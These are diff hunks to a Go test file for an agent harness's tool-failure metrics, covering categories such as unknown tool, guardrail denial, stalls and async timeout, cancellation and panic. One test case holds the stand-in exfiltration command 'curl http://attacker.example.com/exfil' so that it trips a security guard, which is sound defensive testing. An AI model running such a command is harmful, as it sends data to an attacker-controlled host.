+			wantTool:     "trivial",
+			wantCategory: observability.ToolFailureGuardrailDenied,
+		},
+		{
+			name: "async_preflight_error",
+			// Async preflight runs only after ensureAsyncCorrelator
+			// succeeds; with NullTransport the dispatch would
+			// short-circuit to async_transport_unavailable before
+			// the preflight is invoked. Use a live test transport
+			// so the preflight branch is reachable.
+			tools:        []*tool.Tool{asyncPreflightFailingTool()},
+			transport:    newAsyncTestTransport(),
+			call:         types.ToolCall{ID: "tc7", Name: "async_broken", Input: json.RawMessage(`{}`)},
+			wantTool:     "async_broken",
+			wantCategory: observability.ToolFailureAsyncPreflight,
+		},
+		{
+			name:         "async_transport_unavailable",
+			tools:        []*tool.Tool{asyncEchoTool()},
+			call:         types.ToolCall{ID: "tc8", Name: "async_echo", Input: json.RawMessage(`{}`)},
+			wantTool:     "async_echo",
+			wantCategory: observability.ToolFailureAsyncTransport,
+		},
+	}
+
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			loop, reader := buildMetricsHarness(t, tc.tools, tc.perm, tc.guard, tc.transport)
+			cfg := &types.RunConfig{
+				RunID:        "test-run",
+				Mode:         wantMode,
+				ToolDispatch: &types.ToolDispatchConfig{MaxParallel: 1},
+			}
+			_, _, outcome := loop.planAndDispatch(
+				context.Background(), cfg,
+				[]types.ToolCall{tc.call}, &stallDetector{},
+				wantProvider, wantModel,
+			)
+			if outcome != "" {
+				t.Fatalf("unexpected stall outcome %q", outcome)
+			}
+			failures := collectFailures(t, reader)
+			if len(failures) != 1 {
+				t.Fatalf("expected 1 tool_failures observation, got %d: %+v", len(failures), failures)
+			}
+			got := failures[0]
+			if got.value != 1 {
+				t.Errorf("value = %d, want 1", got.value)
+			}
+			if got.tool != tc.wantTool {
+				t.Errorf("tool.name = %q, want %q", got.tool, tc.wantTool)
+			}
+			if got.category != tc.wantCategory.String() {
+				t.Errorf("category = %q, want %q", got.category, tc.wantCategory.String())
+			}
+			if got.provider != wantProvider {
+				t.Errorf("provider.type = %q, want %q", got.provider, wantProvider)
+			}
+			if got.model != wantModel {
+				t.Errorf("provider.model = %q, want %q", got.model, wantModel)
+			}
+			if got.mode != wantMode {
+				t.Errorf("run.mode = %q, want %q", got.mode, wantMode)
+			}
+		})
+	}
+}
+
+// TestToolFailureMetrics_NoEmissionOnSuccess pins the converse: a
+// successful sync tool MUST NOT bump stirrup.harness.tool_failures.
+// Without this guard, a regression that swapped the !success branch
+// for an unconditional emit would inflate the counter on every call.
+func TestToolFailureMetrics_NoEmissionOnSuccess(t *testing.T) {
+	loop, reader := buildMetricsHarness(t, []*tool.Tool{trivialTool()}, nil, nil, nil)
+	cfg := &types.RunConfig{
+		RunID:        "test-run-ok",
+		Mode:         "execution",
+		ToolDispatch: &types.ToolDispatchConfig{MaxParallel: 1},
+	}
+	_, _, outcome := loop.planAndDispatch(
+		context.Background(), cfg,
+		[]types.ToolCall{{ID: "tc_ok", Name: "trivial", Input: json.RawMessage(`{}`)}},
+		&stallDetector{}, "anthropic", "claude-sonnet-4-6",
+	)
+	if outcome != "" {
+		t.Fatalf("unexpected stall outcome %q", outcome)
+	}
+	if failures := collectFailures(t, reader); len(failures) != 0 {
+		t.Errorf("expected no tool_failures observations on success path, got %+v", failures)
+	}
+}
+
+// TestToolFailureMetrics_StallTermination verifies the stall detector
+// surfaces its terminations into the tool-failure series. Five
+// consecutive failed calls trip the consecutive-failures path; the
+// metric emission must carry the stall_consecutive_failures category
+// alongside the per-call handler_error emissions.
+func TestToolFailureMetrics_StallTermination(t *testing.T) {
+	loop, reader := buildMetricsHarness(t, []*tool.Tool{erroringTool()}, nil, nil, nil)
+	cfg := &types.RunConfig{
+		RunID:        "test-run-stall",
+		Mode:         "execution",
+		ToolDispatch: &types.ToolDispatchConfig{MaxParallel: 1},
+	}
+	// Use distinct inputs so the repeated-call heuristic does not trip
+	// first; we want the consecutive-failures path specifically.
+	calls := []types.ToolCall{
+		{ID: "tc_s0", Name: "explode", Input: json.RawMessage(`{"i":0}`)},
+		{ID: "tc_s1", Name: "explode", Input: json.RawMessage(`{"i":1}`)},
+		{ID: "tc_s2", Name: "explode", Input: json.RawMessage(`{"i":2}`)},
+		{ID: "tc_s3", Name: "explode", Input: json.RawMessage(`{"i":3}`)},
+		{ID: "tc_s4", Name: "explode", Input: json.RawMessage(`{"i":4}`)},
+	}
+	_, _, outcome := loop.planAndDispatch(
+		context.Background(), cfg,
+		calls, &stallDetector{},
+		"anthropic", "claude-sonnet-4-6",
+	)
+	if outcome != "tool_failures" {
+		t.Fatalf("expected stall outcome tool_failures, got %q", outcome)
+	}
+	failures := collectFailures(t, reader)
+	// We expect: 5 handler_error emissions (one per failed call) and
+	// exactly one stall_consecutive_failures emission tagged with the
+	// fifth tool name.
+	var (
+		handlerErrors int64
+		stallCount    int64
+	)
+	for _, fp := range failures {
+		switch fp.category {
+		case observability.ToolFailureHandlerError.String():
+			handlerErrors += fp.value
+		case observability.ToolFailureStallConsecutiveFailures.String():
+			stallCount += fp.value
+		}
+	}
+	if handlerErrors != 5 {
+		t.Errorf("handler_error count = %d, want 5", handlerErrors)
+	}
+	if stallCount != 1 {
+		t.Errorf("stall_consecutive_failures count = %d, want 1", stallCount)
+	}
+}
+
+// TestToolFailureCategory_BoundedCardinality is the cardinality guard:
+// every category value emitted by the harness MUST pass IsValid. A
+// future producer that invents a free-form string (e.g. "
+// permission_denied_v2") would silently widen the metric's label
+// cardinality; this test pins the bound by asserting every emission's
+// category is recognised.
+//
+// Combined with the table-driven test above (which covers each known
+// category at its dispatch site), this defines an interlock: any new
+// category MUST be added to the enum to be IsValid, AND any free-form
+// string slipped past the dispatch site fails this assertion.
+func TestToolFailureCategory_BoundedCardinality(t *testing.T) {
+	// Pick a mix of categories drawn from different dispatch sites so
+	// the assertion sweeps every emission path simultaneously: an
+	// unknown_tool failure (dispatchToolCall pre-checks), a
+	// schema_validation_failed failure (mid-dispatchToolCall), a
+	// guardrail_denied failure (planAndDispatch pre-dispatch guard),
+	// a handler_error failure (terminal Handler), and a series of
+	// failed calls that trip the stall path.
+	loop, reader := buildMetricsHarness(t,
+		[]*tool.Tool{trivialTool(), schemaTool(), erroringTool()},
+		nil, nil, nil,
+	)
+	cfg := &types.RunConfig{
+		RunID:        "test-run-card",
+		Mode:         "execution",
+		ToolDispatch: &types.ToolDispatchConfig{MaxParallel: 1},
+	}
+	calls := []types.ToolCall{
+		{ID: "u1", Name: "does_not_exist", Input: json.RawMessage(`{}`)},
+		{ID: "s1", Name: "needs_path", Input: json.RawMessage(`{}`)},
+		{ID: "e1", Name: "explode", Input: json.RawMessage(`{"i":1}`)},
+		{ID: "e2", Name: "explode", Input: json.RawMessage(`{"i":2}`)},
+		{ID: "e3", Name: "explode", Input: json.RawMessage(`{"i":3}`)},
+		{ID: "e4", Name: "explode", Input: json.RawMessage(`{"i":4}`)},
+	}
+	_, _, _ = loop.planAndDispatch(
+		context.Background(), cfg,
+		calls, &stallDetector{},
+		"anthropic", "claude-sonnet-4-6",
+	)
+	failures := collectFailures(t, reader)
+	if len(failures) == 0 {
+		t.Fatal("expected at least one tool_failures observation; none were emitted")
+	}
+	for _, fp := range failures {
+		if fp.category == "" {
+			t.Errorf("emission with empty category: %+v", fp)
+			continue
+		}
+		if !observability.ToolFailureCategory(fp.category).IsValid() {
+			t.Errorf("emission carried unknown category %q: %+v", fp.category, fp)
+		}
+	}
+}
+
+// TestToolFailureCategory_EnumIsValid sanity-checks the enum itself:
+// every exported ToolFailure* constant declared in toolfailure.go must
+// be registered in allToolFailureCategories. A new constant added
+// without a matching map entry would IsValid()=false at runtime and
+// silently drop emissions; this test catches that omission at build
+// time of the test binary.
+func TestToolFailureCategory_EnumIsValid(t *testing.T) {
+	known := []observability.ToolFailureCategory{
+		observability.ToolFailureUnknownTool,
+		observability.ToolFailureSchemaValidation,
+		observability.ToolFailureSecurityGuard,
+		observability.ToolFailurePermissionDenied,
+		observability.ToolFailurePermissionError,
+		observability.ToolFailureGuardrailDenied,
+		observability.ToolFailureHandlerError,
+		observability.ToolFailureHandlerMissing,
+		observability.ToolFailureAsyncPreflight,
+		observability.ToolFailureAsyncTransport,
+		observability.ToolFailureAsyncTimeout,
+		observability.ToolFailureAsyncCancelled,
+		observability.ToolFailureAsyncUpstreamError,
+		observability.ToolFailureAsyncPanic,
+		observability.ToolFailureAsyncInternal,
+		observability.ToolFailureProviderRequest,
+		observability.ToolFailureProviderStream,
+		observability.ToolFailureStallRepeated,
+		observability.ToolFailureStallConsecutiveFailures,
+	}
+	for _, c := range known {
+		if !c.IsValid() {
+			t.Errorf("constant %q is not registered in allToolFailureCategories", c)
+		}
+		if c.String() == "" {
+			t.Errorf("constant has empty wire string")
+		}
+	}
+	// Free-form strings must always fail validation.
+	for _, bogus := range []string{"", "not_a_category", "PermissionDenied", "UNKNOWN_TOOL"} {
+		if observability.ToolFailureCategory(bogus).IsValid() {
+			t.Errorf("bogus category %q must not validate", bogus)
+		}
+	}
+}
+
+// erroringProvider is a ProviderAdapter whose Stream always returns an
+// error before producing any events. Drives the
+// provider_request_failed category test.
+type erroringProvider struct{}
+
+func (erroringProvider) Stream(_ context.Context, _ types.StreamParams) (<-chan types.StreamEvent, error) {
+	return nil, errors.New("provider rejected request")
+}
+
+// streamErroringProvider opens the stream then emits an error event
+// mid-flight. Drives the provider_stream_failed category test.
+type streamErroringProvider struct{}
+
+func (streamErroringProvider) Stream(_ context.Context, _ types.StreamParams) (<-chan types.StreamEvent, error) {
+	ch := make(chan types.StreamEvent, 1)
+	ch <- types.StreamEvent{Type: "error", Error: errors.New("stream parser exploded")}
+	close(ch)
+	return ch, nil
+}
+
+// buildProviderFailureLoop builds a loop wired to a manual-reader
+// metric provider with the supplied test provider and a test tool
+// (which forces the loop to attach tool definitions to its request,
+// gating the tool-failure co-emission).
+func buildProviderFailureLoop(t *testing.T, prov interface {
+	Stream(context.Context, types.StreamParams) (<-chan types.StreamEvent, error)
+}) (*AgenticLoop, *sdkmetric.ManualReader, *types.RunConfig) {
+	t.Helper()
+	reader := sdkmetric.NewManualReader()
+	mp := sdkmetric.NewMeterProvider(sdkmetric.WithReader(reader))
+	metrics, err := observability.NewMetricsForTesting(mp)
+	if err != nil {
+		t.Fatalf("NewMetricsForTesting: %v", err)
+	}
+	registry := tool.NewRegistry()
+	registry.Register(trivialTool())
+	loop := &AgenticLoop{
+		Provider:    prov,
+		Router:      router.NewStaticRouter("anthropic", "claude-sonnet-4-6"),
+		Prompt:      prompt.NewDefaultPromptBuilder(),
+		Context:     contextpkg.NewSlidingWindowStrategy(),
+		Tools:       registry,
+		Edit:        edit.NewWholeFileStrategy(),
+		Verifier:    verifier.NewNoneVerifier(),
+		Permissions: permission.NewAllowAll(),
+		Git:         git.NewNoneGitStrategy(),
+		Transport:   transport.NewStdioTransport(&bytes.Buffer{}, &bytes.Buffer{}),
+		Trace:       trace.NewJSONLTraceEmitter(&bytes.Buffer{}),
+		Tracer:      noop.NewTracerProvider().Tracer(""),
+		Metrics:     metrics,
+		Logger:      slog.New(slog.NewJSONHandler(&bytes.Buffer{}, nil)),
+	}
+	cfg := &types.RunConfig{
+		RunID:            "test-prov-fail",
+		Mode:             "execution",
+		Prompt:           "go",
+		Provider:         types.ProviderConfig{Type: "anthropic", APIKeyRef: "secret://TEST"},
+		ModelRouter:      types.ModelRouterConfig{Type: "static", Provider: "anthropic", Model: "claude-sonnet-4-6"},
+		PromptBuilder:    types.PromptBuilderConfig{Type: "default"},
+		ContextStrategy:  types.ContextStrategyConfig{Type: "sliding-window", MaxTokens: 200000},
+		Executor:         types.ExecutorConfig{Type: "local", Workspace: "/tmp"},
+		EditStrategy:     types.EditStrategyConfig{Type: "whole-file"},
+		Verifier:         types.VerifierConfig{Type: "none"},
+		PermissionPolicy: types.PermissionPolicyConfig{Type: "allow-all"},
+		GitStrategy:      types.GitStrategyConfig{Type: "none"},
+		TraceEmitter:     types.TraceEmitterConfig{Type: "jsonl"},
+		MaxTurns:         2,
+	}
+	return loop, reader, cfg
+}
+
+// TestToolFailureMetrics_ProviderRequestRejected verifies the
+// provider-side request-rejection failure path: when a turn has tool
+// definitions attached and the provider's Stream() call errors out
+// before any events flow, the stirrup.harness.tool_failures counter
+// must increment with category=provider_request_failed.
+func TestToolFailureMetrics_ProviderRequestRejected(t *testing.T) {
+	loop, reader, cfg := buildProviderFailureLoop(t, erroringProvider{})
+	_, _ = loop.Run(context.Background(), cfg)
+	failures := collectFailures(t, reader)
+	found := false
+	for _, fp := range failures {
+		if fp.category == observability.ToolFailureProviderRequest.String() {
+			found = true
+			if fp.provider != "anthropic" || fp.model != "claude-sonnet-4-6" || fp.mode != "execution" {
+				t.Errorf("labels = %+v, want provider/model/mode populated", fp)
+			}
+		}
+	}
+	if !found {
+		t.Errorf("expected provider_request_failed observation, got %+v", failures)
+	}
+}
+
+// TestToolFailureMetrics_ProviderStreamFailed verifies the
+// mid-stream-failure path: a tool-bearing turn whose stream errors
+// after opening must emit category=provider_stream_failed.
+func TestToolFailureMetrics_ProviderStreamFailed(t *testing.T) {
+	loop, reader, cfg := buildProviderFailureLoop(t, streamErroringProvider{})
+	_, _ = loop.Run(context.Background(), cfg)
+	failures := collectFailures(t, reader)
+	found := false
+	for _, fp := range failures {
+		if fp.category == observability.ToolFailureProviderStream.String() {
+			found = true
+		}
+	}
+	if !found {
+		t.Errorf("expected provider_stream_failed observation, got %+v", failures)
+	}
+}
+
+// TestToolFailureMetrics_ErrorCategoryInTrace verifies the
+// co-emission contract: every failed RecordToolCall must carry the
+// same category that lands on stirrup.harness.tool_failures so JSONL
+// traces and metrics dashboards report the same taxonomy.
+func TestToolFailureMetrics_ErrorCategoryInTrace(t *testing.T) {
+	loop, _ := buildMetricsHarness(t, []*tool.Tool{erroringTool()}, nil, nil, nil)
+	rec := &recordingTraceEmitter{}
+	loop.Trace = rec
+	cfg := &types.RunConfig{
+		RunID:        "test-trace",
+		Mode:         "execution",
+		ToolDispatch: &types.ToolDispatchConfig{MaxParallel: 1},
+	}
+	_, _, _ = loop.planAndDispatch(
+		context.Background(), cfg,
+		[]types.ToolCall{{ID: "tc_x", Name: "explode", Input: json.RawMessage(`{}`)}},
+		&stallDetector{},
+		"anthropic", "claude-sonnet-4-6",
+	)
+	_, calls := rec.snapshot()
+	if len(calls) != 1 {
+		t.Fatalf("expected 1 recorded tool call, got %d", len(calls))
+	}
+	if calls[0].Success {
+		t.Fatal("expected failed call")
+	}
+	if calls[0].ErrorCategory != observability.ToolFailureHandlerError.String() {
+		t.Errorf("ErrorCategory = %q, want %q", calls[0].ErrorCategory, observability.ToolFailureHandlerError)
+	}
+}

--- a/harness/internal/core/tool_failure_metrics_test.go
+++ b/harness/internal/core/tool_failure_metrics_test.go
@@ -959,8 +959,8 @@ func TestToolFailureMetrics_AsyncPanic(t *testing.T) {
 	}
 	loop, reader := buildMetricsHarness(t, []*tool.Tool{panicTool}, nil, nil, tr)
 	cfg := &types.RunConfig{
-		RunID:        "test-run-panic",
-		Mode:         "execution",
+		RunID: "test-run-panic",
+		Mode:  "execution",
 		// The fan-out goroutine is the panic recovery site; ensure
 		// the async branch is taken by MaxParallel >= 1.
 		ToolDispatch: &types.ToolDispatchConfig{MaxParallel: 1},

--- a/harness/internal/core/tool_failure_metrics_test.go
+++ b/harness/internal/core/tool_failure_metrics_test.go
@@ -214,6 +214,33 @@ func asyncPreflightFailingTool() *tool.Tool {
 	}
 }
 
+// commandTool is a sync tool whose schema accepts a 'command' field.
+// Used to drive the security_guard_denied category: an input value
+// shaped like an exfiltration command (`curl http://...`) trips
+// security.GuardToolCall's exfiltration_command rule before dispatch.
+func commandTool() *tool.Tool {
+	return &tool.Tool{
+		Name:        "shell_runner",
+		Description: "tool with a command field that the security guard inspects",
+		InputSchema: json.RawMessage(`{"type":"object","properties":{"command":{"type":"string"}},"required":["command"]}`),
+		Handler: func(_ context.Context, _ json.RawMessage) (string, error) {
+			return "ran", nil
+		},
+	}
+}
+
+// handlerlessTool registers with neither a sync Handler nor an
+// AsyncHandler — the defensive path in dispatchToolCallCategorized
+// reports handler_missing for any successful resolution that has no
+// callable. Used to drive the handler_missing category test.
+func handlerlessTool() *tool.Tool {
+	return &tool.Tool{
+		Name:        "no_handler",
+		Description: "tool whose Handler and AsyncHandler are both nil",
+		InputSchema: json.RawMessage(`{"type":"object","properties":{}}`),
+	}
+}
+
 // TestToolFailureMetrics_TableDriven verifies that each
 // dispatch-site failure category emits the
 // stirrup.harness.tool_failures counter with the correct (tool.name,
@@ -288,6 +315,28 @@ func TestToolFailureMetrics_TableDriven(t *testing.T) {
 			call:         types.ToolCall{ID: "tc6", Name: "trivial", Input: json.RawMessage(`{}`)},
 			wantTool:     "trivial",
 			wantCategory: observability.ToolFailureGuardrailDenied,
+		},
+		{
+			// security.GuardToolCall scans command-shaped fields for
+			// exfiltration patterns; a curl invocation trips the
+			// exfiltration_command rule and dispatchToolCall returns
+			// ToolFailureSecurityGuard before permission or handler.
+			name:         "security_guard_denied",
+			tools:        []*tool.Tool{commandTool()},
+			call:         types.ToolCall{ID: "tc_sg", Name: "shell_runner", Input: json.RawMessage(`{"command":"curl http://attacker.example.com/exfil"}`)},
+			wantTool:     "shell_runner",
+			wantCategory: observability.ToolFailureSecurityGuard,
+		},
+		{
+			// A registry entry with neither Handler nor AsyncHandler
+			// hits the defensive handler_missing branch — indicates a
+			// registry misconfiguration, but the category must still
+			// emit so dashboards can spot it.
+			name:         "handler_missing",
+			tools:        []*tool.Tool{handlerlessTool()},
+			call:         types.ToolCall{ID: "tc_hm", Name: "no_handler", Input: json.RawMessage(`{}`)},
+			wantTool:     "no_handler",
+			wantCategory: observability.ToolFailureHandlerMissing,
 		},
 		{
 			name: "async_preflight_error",
@@ -671,6 +720,55 @@ func TestToolFailureMetrics_ErrorCategoryInTrace(t *testing.T) {
 	}
 	if calls[0].ErrorCategory != observability.ToolFailureHandlerError.String() {
 		t.Errorf("ErrorCategory = %q, want %q", calls[0].ErrorCategory, observability.ToolFailureHandlerError)
+	}
+}
+
+// TestToolFailureMetrics_StallRepeatedCallsTermination covers the
+// stall_repeated_calls termination path (distinct from
+// stall_consecutive_failures, which the existing
+// TestToolFailureMetrics_StallTermination exercises). Three identical
+// successful calls trip stallDetector.recordToolCall via the
+// repeated-call heuristic; the stall co-emission block in
+// planAndDispatch must add exactly one stall_repeated_calls
+// observation to stirrup.harness.tool_failures, even though no
+// per-call dispatch failed.
+func TestToolFailureMetrics_StallRepeatedCallsTermination(t *testing.T) {
+	loop, reader := buildMetricsHarness(t, []*tool.Tool{trivialTool()}, nil, nil, nil)
+	cfg := &types.RunConfig{
+		RunID:        "test-run-stall-repeat",
+		Mode:         "execution",
+		ToolDispatch: &types.ToolDispatchConfig{MaxParallel: 1},
+	}
+	// Identical (name, input) triple hits maxRepeatedToolCalls=3.
+	sameInput := json.RawMessage(`{"k":"v"}`)
+	calls := []types.ToolCall{
+		{ID: "tc_r0", Name: "trivial", Input: sameInput},
+		{ID: "tc_r1", Name: "trivial", Input: sameInput},
+		{ID: "tc_r2", Name: "trivial", Input: sameInput},
+	}
+	_, _, outcome := loop.planAndDispatch(
+		context.Background(), cfg,
+		calls, &stallDetector{},
+		"anthropic", "claude-sonnet-4-6",
+	)
+	if outcome != "stalled" {
+		t.Fatalf("expected stall outcome 'stalled', got %q", outcome)
+	}
+	failures := collectFailures(t, reader)
+	var stallRepeated int64
+	for _, fp := range failures {
+		if fp.category == observability.ToolFailureStallRepeated.String() {
+			stallRepeated += fp.value
+			if fp.tool != "trivial" {
+				t.Errorf("stall_repeated_calls tool.name = %q, want %q", fp.tool, "trivial")
+			}
+			if fp.provider != "anthropic" || fp.model != "claude-sonnet-4-6" || fp.mode != "execution" {
+				t.Errorf("stall_repeated_calls labels = %+v, want provider/model/mode populated", fp)
+			}
+		}
+	}
+	if stallRepeated != 1 {
+		t.Errorf("stall_repeated_calls count = %d, want exactly 1", stallRepeated)
 	}
 }
 

--- a/harness/internal/core/tool_failure_metrics_test.go
+++ b/harness/internal/core/tool_failure_metrics_test.go
@@ -238,10 +238,17 @@ func TestToolFailureMetrics_TableDriven(t *testing.T) {
 		wantCategory observability.ToolFailureCategory
 	}{
 		{
+			// Locks in the __unknown__ sentinel substitution: when
+			// the model emits a tool_use whose name does not
+			// resolve, the metric MUST report the bounded sentinel
+			// rather than the raw (model-controlled) name. Trace
+			// records still carry the raw name; only the TSDB
+			// label is sanitised. Regression test for the
+			// label-cardinality DoS (CWE-400) closed in this PR.
 			name:         "unknown_tool",
 			tools:        []*tool.Tool{trivialTool()},
 			call:         types.ToolCall{ID: "tc1", Name: "does_not_exist", Input: json.RawMessage(`{}`)},
-			wantTool:     "does_not_exist",
+			wantTool:     "__unknown__",
 			wantCategory: observability.ToolFailureUnknownTool,
 		},
 		{

--- a/harness/internal/core/tool_failure_metrics_test.go
+++ b/harness/internal/core/tool_failure_metrics_test.go
@@ -6,6 +6,7 @@ import (
 	"encoding/json"
 	"errors"
 	"log/slog"
+	"strings"
 	"testing"
 	"time"
 
@@ -822,3 +823,192 @@ func TestToolFailureMetrics_AsyncDeadlineRoutesToTimeout(t *testing.T) {
 		t.Errorf("async_cancelled count = %d, want 0 (deadline must NOT route to cancelled); full failures = %+v", cancelledHits, failures)
 	}
 }
+
+// TestToolFailureMetrics_AsyncCancelled exercises the user-driven
+// cancellation path: a live transport that never resolves, dispatch
+// blocks on the correlator, and the run context is cancelled
+// explicitly (not via deadline). Must emit async_cancelled, NOT
+// async_timeout — the operator-visible distinction the deadline split
+// preserves.
+func TestToolFailureMetrics_AsyncCancelled(t *testing.T) {
+	tr := newAsyncTestTransport()
+	loop, reader := buildMetricsHarness(t, []*tool.Tool{asyncEchoTool()}, nil, nil, tr)
+	cfg := &types.RunConfig{
+		RunID:        "test-run-cancel",
+		Mode:         "execution",
+		ToolDispatch: &types.ToolDispatchConfig{MaxParallel: 1},
+	}
+	ctx, cancel := context.WithCancel(context.Background())
+	// Cancel once the request has been emitted (so we know the Await
+	// is registered and will observe the cancellation via its
+	// ctx.Done branch). The 2s deadline is a wiring-failure guard,
+	// not a timeout we expect to hit.
+	go func() {
+		deadline := time.Now().Add(2 * time.Second)
+		for time.Now().Before(deadline) {
+			if tr.lastRequestID("tool_result_request") != "" {
+				cancel()
+				return
+			}
+			time.Sleep(time.Millisecond)
+		}
+	}()
+	_, _, outcome := loop.planAndDispatch(
+		ctx, cfg,
+		[]types.ToolCall{{ID: "tc_cancel", Name: "async_echo", Input: json.RawMessage(`{}`)}},
+		&stallDetector{},
+		"anthropic", "claude-sonnet-4-6",
+	)
+	if outcome != "" {
+		t.Fatalf("unexpected stall outcome %q", outcome)
+	}
+	failures := collectFailures(t, reader)
+	var timeoutHits, cancelledHits int64
+	for _, fp := range failures {
+		switch fp.category {
+		case observability.ToolFailureAsyncTimeout.String():
+			timeoutHits += fp.value
+		case observability.ToolFailureAsyncCancelled.String():
+			cancelledHits += fp.value
+		}
+	}
+	if cancelledHits != 1 {
+		t.Errorf("async_cancelled count = %d, want exactly 1; full failures = %+v", cancelledHits, failures)
+	}
+	if timeoutHits != 0 {
+		t.Errorf("async_timeout count = %d, want 0 on explicit cancellation; full failures = %+v", timeoutHits, failures)
+	}
+}
+
+// TestToolFailureMetrics_AsyncUpstreamError exercises the
+// IsError=true response path: the control plane delivers a
+// tool_result_response with IsError=true, which dispatch maps to
+// async_upstream_error to keep upstream faults distinct from
+// harness-side faults on dashboards.
+func TestToolFailureMetrics_AsyncUpstreamError(t *testing.T) {
+	tr := newAsyncTestTransport()
+	loop, reader := buildMetricsHarness(t, []*tool.Tool{asyncEchoTool()}, nil, nil, tr)
+	cfg := &types.RunConfig{
+		RunID:        "test-run-upstream-err",
+		Mode:         "execution",
+		ToolDispatch: &types.ToolDispatchConfig{MaxParallel: 1},
+	}
+	// Fire a matching IsError=true response after the dispatch
+	// emits its tool_result_request.
+	go func() {
+		deadline := time.Now().Add(2 * time.Second)
+		for time.Now().Before(deadline) {
+			if id := tr.lastRequestID("tool_result_request"); id != "" {
+				yes := true
+				tr.FireControl(types.ControlEvent{
+					Type:      "tool_result_response",
+					RequestID: id,
+					Content:   "upstream said no",
+					IsError:   &yes,
+				})
+				return
+			}
+			time.Sleep(time.Millisecond)
+		}
+	}()
+	results, _, outcome := loop.planAndDispatch(
+		context.Background(), cfg,
+		[]types.ToolCall{{ID: "tc_upstream", Name: "async_echo", Input: json.RawMessage(`{}`)}},
+		&stallDetector{},
+		"anthropic", "claude-sonnet-4-6",
+	)
+	if outcome != "" {
+		t.Fatalf("unexpected stall outcome %q", outcome)
+	}
+	if len(results) != 1 || !results[0].IsError {
+		t.Fatalf("expected one errored result, got %+v", results)
+	}
+	if !strings.Contains(results[0].Content, "upstream_error:") {
+		t.Errorf("result content missing upstream_error: prefix, got %q", results[0].Content)
+	}
+	failures := collectFailures(t, reader)
+	var upstreamHits int64
+	for _, fp := range failures {
+		if fp.category == observability.ToolFailureAsyncUpstreamError.String() {
+			upstreamHits += fp.value
+			if fp.tool != "async_echo" {
+				t.Errorf("async_upstream_error tool.name = %q, want %q", fp.tool, "async_echo")
+			}
+		}
+	}
+	if upstreamHits != 1 {
+		t.Errorf("async_upstream_error count = %d, want exactly 1; full failures = %+v", upstreamHits, failures)
+	}
+}
+
+// TestToolFailureMetrics_AsyncPanic exercises the Phase 2 goroutine
+// panic-recovery path: a panicking AsyncHandler must be recovered,
+// converted into a structured tool failure, and tagged async_panic.
+// Sibling calls must be unaffected — the panic test in
+// dispatch_parallel_test.go covers that invariant; this test focuses
+// on the metric emission specifically.
+func TestToolFailureMetrics_AsyncPanic(t *testing.T) {
+	tr := newAsyncTestTransport()
+	panicTool := &tool.Tool{
+		Name:        "async_will_panic",
+		Description: "async tool whose preflight panics",
+		InputSchema: json.RawMessage(`{"type":"object","properties":{}}`),
+		AsyncHandler: func(_ context.Context, _ json.RawMessage) (tool.AsyncDispatch, error) {
+			panic("synthetic panic for metrics test")
+		},
+	}
+	loop, reader := buildMetricsHarness(t, []*tool.Tool{panicTool}, nil, nil, tr)
+	cfg := &types.RunConfig{
+		RunID:        "test-run-panic",
+		Mode:         "execution",
+		// The fan-out goroutine is the panic recovery site; ensure
+		// the async branch is taken by MaxParallel >= 1.
+		ToolDispatch: &types.ToolDispatchConfig{MaxParallel: 1},
+	}
+	results, _, outcome := loop.planAndDispatch(
+		context.Background(), cfg,
+		[]types.ToolCall{{ID: "tc_panic_m", Name: "async_will_panic", Input: json.RawMessage(`{}`)}},
+		&stallDetector{},
+		"anthropic", "claude-sonnet-4-6",
+	)
+	if outcome != "" {
+		t.Fatalf("unexpected stall outcome %q", outcome)
+	}
+	if len(results) != 1 || !results[0].IsError {
+		t.Fatalf("expected one errored result on panic, got %+v", results)
+	}
+	if !strings.Contains(results[0].Content, "panic") {
+		t.Errorf("result content missing 'panic' substring, got %q", results[0].Content)
+	}
+	failures := collectFailures(t, reader)
+	var panicHits int64
+	for _, fp := range failures {
+		if fp.category == observability.ToolFailureAsyncPanic.String() {
+			panicHits += fp.value
+			if fp.tool != "async_will_panic" {
+				t.Errorf("async_panic tool.name = %q, want %q", fp.tool, "async_will_panic")
+			}
+		}
+	}
+	if panicHits != 1 {
+		t.Errorf("async_panic count = %d, want exactly 1; full failures = %+v", panicHits, failures)
+	}
+}
+
+// async_internal_error is intentionally untested.
+//
+// The category is emitted at types.go's defensive "unexpected payload
+// type" branch in dispatchAsyncToolCall: it only fires if the loop's
+// async correlator were attached with a PayloadExtractor that
+// delivers something other than asyncToolResult. The production code
+// wires extractAsyncToolResult exclusively (see
+// ensureAsyncCorrelator), so the branch is unreachable without
+// exposing a test-only hook on the correlator-attach path or
+// introducing a parallel construction path.
+//
+// Per the synthesis brief's explicit allowance for this gap, the
+// deferral is documented here rather than weakening the seam.
+// TODO(#229-followup): if a future refactor exposes a way to inject
+// a custom PayloadExtractor for tests, add a TestToolFailureMetrics_
+// AsyncInternalError that submits a non-asyncToolResult payload and
+// asserts async_internal_error emission.

--- a/harness/internal/core/tool_failure_metrics_test.go
+++ b/harness/internal/core/tool_failure_metrics_test.go
@@ -7,6 +7,7 @@ import (
 	"errors"
 	"log/slog"
 	"testing"
+	"time"
 
 	sdkmetric "go.opentelemetry.io/otel/sdk/metric"
 	"go.opentelemetry.io/otel/sdk/metric/metricdata"
@@ -663,5 +664,56 @@ func TestToolFailureMetrics_ErrorCategoryInTrace(t *testing.T) {
 	}
 	if calls[0].ErrorCategory != observability.ToolFailureHandlerError.String() {
 		t.Errorf("ErrorCategory = %q, want %q", calls[0].ErrorCategory, observability.ToolFailureHandlerError)
+	}
+}
+
+// TestToolFailureMetrics_AsyncDeadlineRoutesToTimeout is the
+// verification test for the deadline/cancellation split in
+// dispatchAsyncToolCall. When the run context expires by deadline,
+// the async dispatch MUST emit async_timeout, NOT async_cancelled —
+// operators alert on async_cancelled to detect user-cancellation
+// spikes; every deadline-bounded run polluting that series defeats
+// the alert. The synthesis brief requires explicit assertions that
+// async_timeout is emitted AND async_cancelled is NOT emitted on a
+// deadline-expired context, so both conditions are checked below.
+func TestToolFailureMetrics_AsyncDeadlineRoutesToTimeout(t *testing.T) {
+	tr := newAsyncTestTransport()
+	loop, reader := buildMetricsHarness(t, []*tool.Tool{asyncEchoTool()}, nil, nil, tr)
+	cfg := &types.RunConfig{
+		RunID:        "test-run-deadline",
+		Mode:         "execution",
+		ToolDispatch: &types.ToolDispatchConfig{MaxParallel: 1},
+	}
+	// Deadline set in the immediate past so correlator.Await's
+	// ctx.Done branch fires with context.DeadlineExceeded. No
+	// tool_result_response is ever fired: the dispatch unblocks via
